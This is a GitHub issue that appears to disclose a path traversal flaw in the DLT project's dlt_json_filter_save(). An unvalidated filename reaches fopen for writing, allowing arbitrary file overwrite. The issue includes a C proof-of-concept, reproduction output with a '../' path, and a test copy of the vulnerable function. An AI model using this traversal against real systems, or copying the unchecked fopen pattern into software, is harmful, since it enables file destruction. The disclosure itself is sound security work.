Skip to content

Path Traversal in dlt_json_filter_save() #889

Description

@cryptcrack

Summary

The dlt_json_filter_save() API is vulnerable to Path Traversal leading to Arbitrary File Write/Truncation due to an absolute lack of input validation. The function accepts a raw string via the filename parameter, which is passed directly to fopen(filename, "w") at dlt-control-common.c:970 without any canonicalization or path restriction.

FILE *handle = fopen(filename, "w");

This specific vulnerable block is active when the project is compiled with -DWITH_EXTENDED_FILTERING=ON under the QNX platform guard (#ifdef QNX). Consequently, if a calling application passes user-controlled input to this function, an attacker can inject relative path modifiers (e.g., ../) to traverse directories, allowing them to create or entirely overwrite arbitrary files with the privileges of the running process.

PoC

#include <stdio.h>
#include <string.h>

#include "dlt_types.h"
#include "dlt-control-common.h"

extern DltReturnValue dlt_json_filter_save(DltFilter *filter, const char *filename, int verbose);

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Usage: %s <target_path>\n", argv[0]);
        return 1;
    }

    DltFilter filter;
    memset(&filter, 0, sizeof(DltFilter));

    char *target_path = argv[1];
    printf("[*] Calling dlt_json_filter_save() from the actual library.\n");
    printf("[*] Target path provided: %s\n", target_path);

    DltReturnValue ret = dlt_json_filter_save(&filter, target_path, 1);

    if (ret == DLT_RETURN_OK) {
        printf("[+] SUCCESS: Vulnerability successfully triggered in the actual library!\n");
        return 0;
    } else {
        printf("[-] FAILURE: The function returned an error.\n");
        return 1;
    }
}

Reproduction Steps

$ ./poc "/tmp/../tmp/poc_test.txt"
[*] Calling dlt_json_filter_save() from the actual library.
[*] Target path provided: /tmp/../tmp/poc_test.txt
Saving current filter into '/tmp/../tmp/poc_test.txt'
[+] SUCCESS: Vulnerability successfully triggered in the actual library!

ls -l /tmp/poc_test.txt
-rw-rw-r-- 1 ubuntu ubuntu 37 Jun 24 05:57 /tmp/poc_test.txt

Due to the lack of a QNX environment, the target function was manually enabled as shown below to conduct the test.

DltReturnValue dlt_json_filter_save(DltFilter *filter, const char *filename, int verbose)
{
    if ((filter == NULL) || (filename == NULL))
        return DLT_RETURN_WRONG_PARAMETER;

    if(verbose)
        pr_verbose("dlt_json_filter_save()\n");

    printf("Saving current filter into '%s'\n", filename);
    FILE *handle = fopen(filename, "w");
    fprintf(handle, "poc test\n");

    fclose(handle);

    return DLT_RETURN_OK;
}

Activity

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions